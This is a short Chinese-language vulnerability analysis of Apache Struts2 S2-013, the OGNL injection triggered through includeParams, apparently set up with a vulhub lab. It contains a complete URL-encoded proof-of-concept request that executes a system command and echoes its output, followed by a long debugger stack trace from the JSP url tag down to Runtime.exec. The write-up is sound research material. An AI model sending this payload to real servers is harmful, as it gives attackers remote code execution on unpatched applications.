Struts2 013 漏洞分析

0x00 前言

继参数和值之后，出现includeParams相关漏洞。

0x01 环境

还是看vulhub

poc：

HelloWorld.action?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%27calc%27).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println(%27dbapp%3D%27%2Bnew%20java.lang.String(%23d))%2C%23out.close()%7D

0x02 正文

先来看分析：

在struts2 中的includeParams如果等于"all"，那么就在URL中包含GET和POST参数，如果原始参数带有ongl表达式的时候，那么就会对其进行一次解析。故而造成了这个漏洞。

这里是translateVariables遍历解析的位置
如果思考怎么才能找的到这个漏洞，从doEndTag中进来，如果是URL的话就会走struts2-core-2.2.3.jar!\org\apache\struts2\components\URL.class，然后后续就没有什么分支了。

完成track

exec:347, Runtime (java.lang)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
invokeMethod:871, OgnlRuntime (ognl)
callAppropriateMethod:1273, OgnlRuntime (ognl)
callMethod:68, ObjectMethodAccessor (ognl)
callMethodWithDebugInfo:117, XWorkMethodAccessor (com.opensymphony.xwork2.ognl.accessor)
callMethod:108, XWorkMethodAccessor (com.opensymphony.xwork2.ognl.accessor)
callMethod:1349, OgnlRuntime (ognl)
getValueBody:90, ASTMethod (ognl)
evaluateGetValueBody:212, SimpleNode (ognl)
getValue:258, SimpleNode (ognl)
getValueBody:141, ASTChain (ognl)
evaluateGetValueBody:212, SimpleNode (ognl)
getValue:258, SimpleNode (ognl)
getValueBody:52, ASTAssign (ognl)
evaluateGetValueBody:212, SimpleNode (ognl)
getValue:258, SimpleNode (ognl)
getValueBody:63, ASTSequence (ognl)
evaluateGetValueBody:212, SimpleNode (ognl)
getValue:258, SimpleNode (ognl)
getValue:494, Ognl (ognl)
getValue:217, OgnlUtil (com.opensymphony.xwork2.ognl)
getValue:342, OgnlValueStack (com.opensymphony.xwork2.ognl)
tryFindValue:331, OgnlValueStack (com.opensymphony.xwork2.ognl)
tryFindValueWhenExpressionIsNotNull:307, OgnlValueStack (com.opensymphony.xwork2.ognl)
findValue:293, OgnlValueStack (com.opensymphony.xwork2.ognl)
findValue:350, OgnlValueStack (com.opensymphony.xwork2.ognl)
translateVariables:196, TextParseUtil (com.opensymphony.xwork2.util)
translateVariables:129, TextParseUtil (com.opensymphony.xwork2.util)
translateVariables:51, TextParseUtil (com.opensymphony.xwork2.util)
translateVariable:288, UrlHelper (org.apache.struts2.views.util)
translateAndEncode:263, UrlHelper (org.apache.struts2.views.util)
buildParameterSubstring:250, UrlHelper (org.apache.struts2.views.util)
buildParametersString:229, UrlHelper (org.apache.struts2.views.util)
buildParametersString:194, UrlHelper (org.apache.struts2.views.util)
buildUrl:172, UrlHelper (org.apache.struts2.views.util)
determineActionURL:410, Component (org.apache.struts2.components)
determineActionURL:68, ComponentUrlProvider (org.apache.struts2.components)
renderUrl:74, ServletUrlRenderer (org.apache.struts2.components)
end:149, URL (org.apache.struts2.components)
doEndTag:42, ComponentTagSupport (org.apache.struts2.views.jsp)
_jspx_meth_s_005furl_005f0:15, index_jsp (org.apache.jsp)
_jspService:15, index_jsp (org.apache.jsp)
service:70, HttpJspBase (org.apache.jasper.runtime)
service:723, HttpServlet (javax.servlet.http)
service:388, JspServletWrapper (org.apache.jasper.servlet)
serviceJspFile:321, JspServlet (org.apache.jasper.servlet)
service:267, JspServlet (org.apache.jasper.servlet)
service:723, HttpServlet (javax.servlet.http)
internalDoFilter:290, ApplicationFilterChain (org.apache.catalina.core)
doFilter:206, ApplicationFilterChain (org.apache.catalina.core)
invoke:646, ApplicationDispatcher (org.apache.catalina.core)
processRequest:436, ApplicationDispatcher (org.apache.catalina.core)
doForward:374, ApplicationDispatcher (org.apache.catalina.core)
forward:302, ApplicationDispatcher (org.apache.catalina.core)
doExecute:157, ServletDispatcherResult (org.apache.struts2.dispatcher)
execute:186, StrutsResultSupport (org.apache.struts2.dispatcher)
executeResult:373, DefaultActionInvocation (com.opensymphony.xwork2)
invoke:277, DefaultActionInvocation (com.opensymphony.xwork2)
doIntercept:176, DefaultWorkflowInterceptor (com.opensymphony.xwork2.interceptor)
intercept:98, MethodFilterInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
doIntercept:263, ValidationInterceptor (com.opensymphony.xwork2.validator)
doIntercept:68, AnnotationValidationInterceptor (org.apache.struts2.interceptor.validation)
intercept:98, MethodFilterInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:133, ConversionErrorInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
doIntercept:207, ParametersInterceptor (com.opensymphony.xwork2.interceptor)
intercept:98, MethodFilterInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
doIntercept:207, ParametersInterceptor (com.opensymphony.xwork2.interceptor)
intercept:98, MethodFilterInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:190, StaticParametersInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:75, MultiselectInterceptor (org.apache.struts2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:94, CheckboxInterceptor (org.apache.struts2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:243, FileUploadInterceptor (org.apache.struts2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:100, ModelDrivenInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:141, ScopedModelDrivenInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:270, DebuggingInterceptor (org.apache.struts2.interceptor.debugging)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:145, ChainingInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
doIntercept:171, PrepareInterceptor (com.opensymphony.xwork2.interceptor)
intercept:98, MethodFilterInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:176, I18nInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:164, ServletConfigInterceptor (org.apache.struts2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:190, AliasInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
intercept:187, ExceptionMappingInterceptor (com.opensymphony.xwork2.interceptor)
invoke:248, DefaultActionInvocation (com.opensymphony.xwork2)
execute:52, StrutsActionProxy (org.apache.struts2.impl)
serviceAction:498, Dispatcher (org.apache.struts2.dispatcher)
doFilter:434, FilterDispatcher (org.apache.struts2.dispatcher)
internalDoFilter:235, ApplicationFilterChain (org.apache.catalina.core)
doFilter:206, ApplicationFilterChain (org.apache.catalina.core)
invoke:233, StandardWrapperValve (org.apache.catalina.core)
invoke:191, StandardContextValve (org.apache.catalina.core)
invoke:127, StandardHostValve (org.apache.catalina.core)
invoke:103, ErrorReportValve (org.apache.catalina.valves)
invoke:109, StandardEngineValve (org.apache.catalina.core)
service:293, CoyoteAdapter (org.apache.catalina.connector)
process:859, Http11Processor (org.apache.coyote.http11)
process:610, Http11Protocol$Http11ConnectionHandler (org.apache.coyote.http11)
run:503, JIoEndpoint$Worker (org.apache.tomcat.util.net)
run:748, Thread (java.lang)

以上